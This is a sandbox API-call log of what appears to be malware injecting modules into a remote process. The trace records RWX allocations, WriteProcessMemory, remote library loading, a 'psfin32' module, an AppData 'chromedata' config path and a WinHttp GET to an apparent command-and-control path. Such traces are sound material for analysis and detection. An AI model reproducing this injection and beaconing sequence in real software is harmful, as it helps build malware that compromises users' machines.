	[0225.586] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.586] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.586] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307988) returned 1
	[0225.586] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.587] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.587] lstrlenA (lpString="wsprintfW") returned 9
	[0225.587] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.587] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc3ee*, nSize=0xa, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc3ee*, lpNumberOfBytesWritten=0x128674*=0xa) returned 1
	[0225.587] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.587] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.587] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.588] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.588] ResetEvent (hEvent=0x5d4) returned 1
	[0225.588] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.588] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.588] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.589] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.589] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000407c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.589] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.589] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc438, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0225.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307988
	[0225.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc438, cbMultiByte=-1, lpWideCharStr=0x2307988, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10
	[0225.589] lstrlenW (lpString="ole32.dll") returned 9
	[0225.589] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.590] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x2307988*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2307988*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0225.590] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.590] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.590] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.590] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.591] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.591] ResetEvent (hEvent=0x5d4) returned 1
	[0225.591] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.591] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.591] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.591] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.591] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.591] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307988) returned 1
	[0225.592] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.592] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.592] lstrlenA (lpString="CoInitializeEx") returned 14
	[0225.592] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.592] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc428*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc428*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0225.592] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.592] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.592] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.592] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.593] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.593] ResetEvent (hEvent=0x5d4) returned 1
	[0225.593] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.594] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.594] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.594] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.594] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100040a8, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.595] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.595] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.595] lstrlenA (lpString="IIDFromString") returned 13
	[0225.595] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.595] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc418*, nSize=0xe, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc418*, lpNumberOfBytesWritten=0x128674*=0xe) returned 1
	[0225.595] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.595] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.596] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.596] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.596] ResetEvent (hEvent=0x5d4) returned 1
	[0225.596] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.636] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.636] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.636] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.636] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.636] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100040ac, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.637] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.637] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.637] lstrlenA (lpString="CoUninitialize") returned 14
	[0225.637] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.637] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc406*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc406*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0225.637] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.637] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.637] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.638] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.638] ResetEvent (hEvent=0x5d4) returned 1
	[0225.638] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.638] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.639] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.639] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.639] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.639] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100040b0, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.639] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.640] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc442, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0225.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307988
	[0225.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc442, cbMultiByte=-1, lpWideCharStr=0x2307988, cchWideChar=13 | out: lpWideCharStr="OLEAUT32.dll") returned 13
	[0225.640] lstrlenW (lpString="OLEAUT32.dll") returned 12
	[0225.640] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.640] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x2307988*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2307988*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0225.640] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.640] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.640] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.641] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.641] ResetEvent (hEvent=0x5d4) returned 1
	[0225.641] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.641] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.641] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.642] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.642] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.642] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307988) returned 1
	[0225.642] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.642] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.642] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.642] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.642] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.643] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.643] ResetEvent (hEvent=0x5d4) returned 1
	[0225.643] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.643] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.643] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.643] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.644] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004074, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.644] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0225.644] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0225.644] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0225.644] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0225.644] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0225.644] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0225.644] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0225.644] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0225.644] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0225.644] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0225.644] VirtualProtectEx (in: hProcess=0x62c, lpAddress=0x10001000, dwSize=0x2a28, flNewProtect=0x20, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0225.645] VirtualProtectEx (in: hProcess=0x62c, lpAddress=0x10004000, dwSize=0x1110, flNewProtect=0x2, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0225.645] VirtualProtectEx (in: hProcess=0x62c, lpAddress=0x10006000, dwSize=0x40c, flNewProtect=0x4, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0225.645] VirtualProtectEx (in: hProcess=0x62c, lpAddress=0x10007000, dwSize=0x3fc, flNewProtect=0x2, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0225.645] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128748, nSize=0x70, lpNumberOfBytesRead=0x128728 | out: lpBuffer=0x128748*, lpNumberOfBytesRead=0x128728*=0x70) returned 1
	[0225.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307988
	[0225.645] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.645] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x2307988*, nSize=0x14, lpNumberOfBytesWritten=0x128720 | out: lpBuffer=0x2307988*, lpNumberOfBytesWritten=0x128720*=0x14) returned 1
	[0225.646] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128748*, nSize=0x70, lpNumberOfBytesWritten=0x128720 | out: lpBuffer=0x128748*, lpNumberOfBytesWritten=0x128720*=0x70) returned 1
	[0225.646] ResetEvent (hEvent=0x5d4) returned 1
	[0225.646] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.646] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128748, nSize=0x70, lpNumberOfBytesRead=0x128720 | out: lpBuffer=0x128748*, lpNumberOfBytesRead=0x128720*=0x70) returned 1
	[0225.646] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.646] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307988) returned 1
	[0225.646] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27ccb48) returned 1
	[0225.646] lstrlenA (lpString="psfin32") returned 7
	[0225.646] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.646] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x22fff90*, nSize=0x8, lpNumberOfBytesWritten=0x128c64 | out: lpBuffer=0x22fff90*, lpNumberOfBytesWritten=0x128c64*=0x8) returned 1
	[0225.647] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.647] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x128fec*, nSize=0x400, lpNumberOfBytesWritten=0x128c64 | out: lpBuffer=0x128fec*, lpNumberOfBytesWritten=0x128c64*=0x400) returned 1
	[0225.647] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x184, flAllocationType=0x3000, flProtect=0x40) returned 0x130000
	[0225.648] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x130000, lpBuffer=0x128de8*, nSize=0x184, lpNumberOfBytesWritten=0x128c60 | out: lpBuffer=0x128de8*, lpNumberOfBytesWritten=0x128c60*=0x184) returned 1
	[0225.648] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128be8, nSize=0x70, lpNumberOfBytesRead=0x128bc8 | out: lpBuffer=0x128be8*, lpNumberOfBytesRead=0x128bc8*=0x70) returned 1
	[0225.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6618
	[0225.648] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x140000
	[0225.648] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x140000, lpBuffer=0x22a6618*, nSize=0x28, lpNumberOfBytesWritten=0x128bc0 | out: lpBuffer=0x22a6618*, lpNumberOfBytesWritten=0x128bc0*=0x28) returned 1
	[0225.649] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128be8*, nSize=0x70, lpNumberOfBytesWritten=0x128bc0 | out: lpBuffer=0x128be8*, lpNumberOfBytesWritten=0x128bc0*=0x70) returned 1
	[0225.649] ResetEvent (hEvent=0x5d4) returned 1
	[0225.649] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.657] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128be8, nSize=0x70, lpNumberOfBytesRead=0x128bc0 | out: lpBuffer=0x128be8*, lpNumberOfBytesRead=0x128bc0*=0x70) returned 1
	[0225.657] VirtualFreeEx (hProcess=0x62c, lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0225.657] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x128fec, nSize=0x400, lpNumberOfBytesRead=0x128c78 | out: lpBuffer=0x128fec*, lpNumberOfBytesRead=0x128c78*=0x400) returned 1
	[0225.657] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.657] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0225.657] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0225.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12854c | out: lpSystemTimeAsFileTime=0x12854c*(dwLowDateTime=0x6ea4a240, dwHighDateTime=0x1d50a6a)) 
	[0225.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12854c | out: lpSystemTimeAsFileTime=0x12854c*(dwLowDateTime=0x6ea4a240, dwHighDateTime=0x1d50a6a)) 
	[0225.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307988
	[0225.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6e40) returned 1
	[0225.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6618
	[0225.658] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0225.658] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0225.658] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/dpost/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0225.658] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x127c3c, dwBufferLength=0x4) returned 1
	[0225.658] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0225.977] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
